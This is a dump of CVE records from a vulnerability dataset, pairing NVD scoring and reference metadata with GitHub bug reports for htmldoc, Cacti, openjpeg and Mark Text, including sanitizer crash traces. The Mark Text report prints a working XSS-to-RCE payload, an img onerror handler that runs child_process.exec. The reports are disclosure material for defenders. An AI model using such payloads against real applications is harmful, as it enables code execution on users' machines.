2022-03-11T05:17:23Z
https://github.com/michaelrsweet/htmldoc/issues/417
794,054,116
417
3,291
CVE-2021-26948
2022-03-03T23:15:08.090
Null pointer dereference in the htmldoc v1.9.11 and before may allow attackers to execute arbitrary code and cause a denial of service via a crafted html file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/410" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/htmldoc/issues/410" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmldoc_project:htmldoc:1.9.11:*:*:*:*:*:*:*", "matchCriteriaId": "F3C6490A-0378-4647-A044-BE4C49DC2904", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/michaelrsweet/htmldoc/issues/410
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "htmldoc" ]
While fuzzing htmldoc I found a segmentation fault in the copy_image() function, in epub.cxx:1221 testcase:(zipped so GitHub accepts it) [crash01.html.zip](https://github.com/michaelrsweet/htmldoc/files/5854045/crash01.html.zip) reproduced by running: ``` htmldoc -f demo.epub crash01.html ``` htmldoc Version v1.9.11 git [master 0f9d20] tested on: OS :Ubuntu 20.04.1 LTS kernel: 5.4.0-53-generic compiler: clang version 10.0.0-4ubuntu1 Target: x86_64-pc-linux-gnu OS : macOS Catalina 10.15.5(19F101) MacBook Pro (Retina, 13-inch, Early 2015) compiler: Apple clang version 11.0.0 (clang-1100.0.33.17) Install from snap or download mac dmg don't crash for this testcase. - addresssanitizer ``` ==3252595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000042fc30 bp 0x7ffe6ab48d00 sp 0x7ffe6ab484a0 T0) ==3252595==The signal is caused by a READ memory access. ==3252595==Hint: address points to the zero page. #0 0x42fc30 in strcmp (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30) #1 0x7f70ce1fd7c7 in bsearch /build/glibc-ZN95T4/glibc-2.31/stdlib/../bits/stdlib-bsearch.h:33:23 #2 0x4c81b0 in copy_image(_zipc_s*, char const*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1221:25 #3 0x4c8434 in copy_images(_zipc_s*, tree_str*) /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:1288:11 #4 0x4c71c5 in epub_export /home/chiba/check_crash/htmldoc/htmldoc/epub.cxx:211:13 #5 0x4d0f13 in main /home/chiba/check_crash/htmldoc/htmldoc/htmldoc.cxx:1291:3 #6 0x7f70ce1dd0b2 in __libc_start_main /build/glibc-ZN95T4/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c5fd in _start (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x41c5fd) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/chiba/check_crash/htmldoc/htmldoc/htmldoc+0x42fc30) in strcmp ==3252595==ABORTING ``` - gdb ``` ─[ DISASM ]─ ► 0x7ffff7de1ed7 <__strcmp_avx2+887> vmovdqu ymm1, ymmword ptr [rdi + rdx] 0x7ffff7de1edc <__strcmp_avx2+892> vpcmpeqb ymm0, ymm1, ymmword ptr [rsi + rdx] 0x7ffff7de1ee1 <__strcmp_avx2+897> vpminub ymm0, ymm0, ymm1 0x7ffff7de1ee5 <__strcmp_avx2+901> vpcmpeqb ymm0, ymm0, ymm7 0x7ffff7de1ee9 <__strcmp_avx2+905> vpmovmskb ecx, ymm0 0x7ffff7de1eed <__strcmp_avx2+909> test ecx, ecx 0x7ffff7de1eef <__strcmp_avx2+911> jne __strcmp_avx2+848 <__strcmp_avx2+848> ↓ 0x7ffff7de1eb0 <__strcmp_avx2+848> add rdi, rdx 0x7ffff7de1eb3 <__strcmp_avx2+851> add rsi, rdx 0x7ffff7de1eb6 <__strcmp_avx2+854> tzcnt edx, ecx 0x7ffff7de1eba <__strcmp_avx2+858> movzx eax, byte ptr [rdi + rdx] ─[ STACK ]── 00:0000│ rsp 0x7fffffffd948 —▸ 0x7ffff7ca27c8 (bsearch+88) ◂— test eax, eax 01:0008│ 0x7fffffffd950 —▸ 0x555555aa6bc0 —▸ 0x555555aa6fd0 —▸ 0x7ffff7e47000 (main_arena+1152) —▸ 0x7ffff7e46ff0 (main_arena+1136) ◂— ... 02:0010│ 0x7fffffffd958 ◂— 0x8 03:0018│ 0x7fffffffd960 ◂— 0x0 04:0020│ 0x7fffffffd968 —▸ 0x555555aa8bf0 —▸ 0x555555aa8af0 —▸ 0x555555aa7f40 —▸ 0x555555aa65c0 ◂— ... 05:0028│ 0x7fffffffd970 —▸ 0x555555aa9200 —▸ 0x555555aa6340 ◂— 0x5555fbad2480 06:0030│ 0x7fffffffd978 —▸ 0x555555aa8fe0 ◂— 0x616d693a61746164 ('data:ima') 07:0038│ 0x7fffffffd980 —▸ 0x5555555cd04b ◂— 0x22263e3c00435253 /* 'SRC' */ pwndbg> bt #0 __strcmp_avx2 () at ../sysdeps/x86_64/multiarch/strcmp-avx2.S:736 #1 0x00007ffff7ca27c8 in __GI_bsearch (__key=0x7fffffffd9a0, __base=0x555555aa6bc0, __nmemb=<optimized out>, __size=8, __compar=0x55555555d609 <compare_images(char**, char**)>) at ../bits/stdlib-bsearch.h:33 #2 0x000055555555d6ed in copy_image (zipc=zipc@entry=0x555555aa9200, filename=filename@entry=0x555555aa8fe0 "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAA,BlBMVEUAAAD///+l2Z/dAAAAM0lEQVR4nGP4/5/h/1+G/58ZDrAz3D/McH8yw83NDDeNGe4Ug9CLzwz3gVLMDA/A6P9/#FGGF\207jOXZtQAAAAAElFTkSuQmCC") at epub.cxx:1235 #3 0x000055555555d81c in copy_images (zipc=zipc@entry=0x555555aa9200, t=0x555555aa8bf0, t@entry=0x555555aa65c0) at epub.cxx:1288 #4 0x000055555555e813 in epub_export (document=0x555555aa65c0, toc=0x555555aa6760) at epub.cxx:211 #5 0x000055555555d448 in main (argc=<optimized out>, argc@entry=4, argv=argv@entry=0x7fffffffe4e8) at htmldoc.cxx:1291 #6 0x00007ffff7c820b3 in __libc_start_main (main=0x55555555af20 <main(int, char**)>, argc=4, argv=0x7fffffffe4e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe4d8) at ../csu/libc-start.c:308 #7 0x000055555555d54e in _start () at htmldoc.cxx:1315 ``` The bug locate in epub.cxx:1221 compare_images. The arguments of compare_images didn't checked so strcmp() lead a segfault due to to null pointer. Reporter: chiba of topsec alphalab
SEGV on unknown address 0x000000000000
https://api.github.com/repos/michaelrsweet/htmldoc/issues/410/comments
2
2021-01-22T07:34:10Z
2022-03-11T02:53:22Z
https://github.com/michaelrsweet/htmldoc/issues/410
791,775,016
410
3,292
CVE-2022-0730
2022-03-03T23:15:08.253
Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/4562" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00038.html" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00039.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RVOALVZSCBFNOAAZVHTJFSFB7UDSNYQ2/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZH67CCORDEYFG7NL7G6UH47PAV2PU7BA/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZJERS4NYIGJUXEGT6ATUQA4CBYBRDLRA/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5298" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/4562" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00038.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00039.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RVOALVZSCBFNOAAZVHTJFSFB7UDSNYQ2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZH67CCORDEYFG7NL7G6UH47PAV2PU7BA/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZJERS4NYIGJUXEGT6ATUQA4CBYBRDLRA/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5298" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:1.2.19:*:*:*:*:*:*:*", "matchCriteriaId": "A4BB8CCB-5F52-4248-947C-3F4F1211EF53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/Cacti/cacti/issues/4562
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
# Describe the bug Under certain ldap conditions, Cacti authentication can be bypassed with certain credential types. ## Expected behavior Cacti security model should work when Anonymous binding is enabled.
When using LDAP, authentication process may be bypassed
https://api.github.com/repos/Cacti/cacti/issues/4562/comments
3
2022-02-21T18:07:52Z
2022-12-02T00:02:09Z
https://github.com/Cacti/cacti/issues/4562
1,146,096,866
4,562
3,293
CVE-2021-3575
2022-03-04T18:15:08.193
A heap-based buffer overflow was found in openjpeg in color.c:379:42 in sycc420_to_rgb when decompressing a crafted .j2k file. An attacker could use this to execute arbitrary code with the permissions of the application compiled against openjpeg.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1957616" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1347" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EZ54FGM2IGAP4AWSJ22JKHOPHCR3FGYU/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QB6AI7CWXWMEDZIQY4LQ6DMIEXMDOHUP/" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2021-3575" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1957616" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/1347" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EZ54FGM2IGAP4AWSJ22JKHOPHCR3FGYU/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QB6AI7CWXWMEDZIQY4LQ6DMIEXMDOHUP/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://ubuntu.com/security/CVE-2021-3575" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uclouvain:openjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "EF45E1A1-20FD-4C31-889F-CE36BE70E370", "versionEndExcluding": null, "versionEndIncluding": "2.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/uclouvain/openjpeg/issues/1347
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "uclouvain", "openjpeg" ]
Hi, I found a vulnerability in current master [0bda718](https://github.com/uclouvain/openjpeg/commit/0bda7188b7b545232a341f1d978b1e4feda46fc2), and I also reproduced it on latest released version [v2.4.0](https://github.com/uclouvain/openjpeg/releases/tag/v2.4.0). **Crash Summary** A heap-buffer-overflow in color.c:379:42 in sycc420_to_rgb, it can lead to heap-based buffer overflow via a crafted `.j2k` file when decompress it. **Crash Analysis** There is insufficient validation of `*cb`. https://github.com/uclouvain/openjpeg/blob/0bda7188b7b545232a341f1d978b1e4feda46fc2/src/bin/common/color.c#L375-L381 **PoC:** [poc.j2k.gz](https://github.com/uclouvain/openjpeg/files/6402272/poc.j2k.gz) **To reproduce (x86-64 Ubuntu 20.04.2 with gcc 9.3.0):** ```bash CFLAGS='-g -fsanitize=address' cmake .. -DCMAKE_BUILD_TYPE=Release make ./bin/opj_decompress -i ./poc.j2k -o out.png ``` **ASAN report:** ``` ================================================================= ==2371124==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000760 at pc 0x0000004f278c bp 0x7ffd11a3eca0 sp 0x7ffd11a3ec98 READ of size 4 at 0x612000000760 thread T0 #0 0x4f278b in sycc420_to_rgb /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/bin/common/color.c:379:42 #1 0x4f278b in color_sycc_to_rgb /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/bin/common/color.c:416:9 #2 0x4cb136 in main /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/bin/jp2/opj_decompress.c:1589:13 #3 0x7f653bef10b2 in __libc_start_main /build/glibc-YbNSs7/glibc-2.31/csu/../csu/libc-start.c:308:16 #4 0x41d4fd in _start (/home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/build/bin/opj_decompress+0x41d4fd) 0x612000000760 is located 0 bytes to the right of 288-byte region [0x612000000640,0x612000000760) allocated by thread T0 here: #0 0x498027 in posix_memalign (/home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/build/bin/opj_decompress+0x498027) #1 0x7f653c38aa5f in opj_aligned_alloc_n /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/lib/openjp2/opj_malloc.c:61:9 #2 0x7f653c38aa5f in opj_aligned_malloc /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/lib/openjp2/opj_malloc.c:209:12 #3 0x7f653c37c257 in opj_alloc_tile_component_data /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/lib/openjp2/tcd.c:697:39 #4 0x7f653c37c257 in opj_tcd_decode_tile /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/lib/openjp2/tcd.c:1561:18 #5 0x7f653c2d6131 in opj_j2k_decode_tile /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/lib/openjp2/j2k.c:9727:11 #6 0x7f653c2f275e in opj_j2k_decode_tiles /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/lib/openjp2/j2k.c:11568:15 #7 0x7f653c2dba43 in opj_j2k_exec /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/lib/openjp2/j2k.c:8871:33 #8 0x7f653c2dba43 in opj_j2k_decode /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/lib/openjp2/j2k.c:11871:11 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/yuawn/fuzz-targets/openjpeg/reproduce/openjpeg/src/bin/common/color.c:379:42 in sycc420_to_rgb Shadow bytes around the buggy address: 0x0c247fff8090: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c247fff80a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c247fff80b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c247fff80c0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c247fff80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c247fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa 0x0c247fff80f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c247fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c247fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c247fff8120: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c247fff8130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2371124==ABORTING ```
Heap-buffer-overflow in color.c:379:42 in sycc420_to_rgb
https://api.github.com/repos/uclouvain/openjpeg/issues/1347/comments
21
2021-04-30T00:10:00Z
2024-02-18T16:18:37Z
https://github.com/uclouvain/openjpeg/issues/1347
871,701,067
1,347
3,294
CVE-2022-25069
2022-03-05T01:15:07.730
Mark Text v0.16.3 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability which allows attackers to perform remote code execution (RCE) via injecting a crafted payload into /lib/contentState/pasteCtrl.js.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/issues/2990" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/pull/3002" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/issues/2990" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/marktext/marktext/pull/3002" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:marktext:marktext:0.16.3:*:*:*:*:*:*:*", "matchCriteriaId": "4A4CFB6C-DCF9-4F86-8DD4-DBE2FC6411C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/marktext/marktext/issues/2990
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "marktext", "marktext" ]
<!-- - Please search for issues that matches the one you want to file and use the thumbs up emoji. - Please make sure your application version is up to date. --> ### Description An attacker can induce Mark Text users to copy the HTML code below to execute a Remote Code Execution attack via XSS. ```html <!-- for windows --> <table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table> <!-- for linux (tested with kali) --> <table><tr><img src onerror="require('child_process').exec('xdg-open .')"></tr></table> ``` The above code is inserted into the Mark Text as a DOM through the source code below, and the remote code execution is performed by calling child_process through the inline script. https://github.com/marktext/marktext/blob/b0299387a5f0b68c7656e2885ee5a520b9c41646/src/muya/lib/contentState/pasteCtrl.js#L44-L65 <!-- Description of the bug --> - [x] Can you reproduce the issue? <!-- no: `[ ]` or yes: `[x]` --> ### Steps to reproduce <!-- Steps how the issue occurred. --> 1. Copy the vulnerable HTML code - `<table><tr><img src onerror="require('child_process').exec('calc.exe')"></tr></table>` 2. Paste it into Mark Text app **Expected behavior:** <!-- What you expected to happen --> HTML should be sanitized before pasted into DOM. **Actual behavior:** <!-- What actually happened --> No HTML sanitize procedure. Only checks if it's wrapped with `<table>` or not. **Link to an example: [optional]** https://user-images.githubusercontent.com/3125044/152838590-accd8020-54de-4eae-9060-1b5a7613b4f4.mp4 https://user-images.githubusercontent.com/3125044/152840175-23769a99-8216-4bb4-8744-12ef27aa5a01.mp4 <!-- If you're reporting a bug that's not reproducible, or it's hard to description, please paste a screenshot of reproducing this issue - gif format is appropriate --> ### Versions - MarkText version: `v0.16.3` - Operating system: Windows 11 `Version 21H2 - OS Build 22000.469` Kali Linux `Kali GNU/Linux Rolling 2021.4`
Security issue: DOM based XSS & RCE - from pasting vulnerable HTML
https://api.github.com/repos/marktext/marktext/issues/2990/comments
0
2022-02-07T17:22:39Z
2022-02-18T10:01:25Z
https://github.com/marktext/marktext/issues/2990
1,126,281,135
2,990
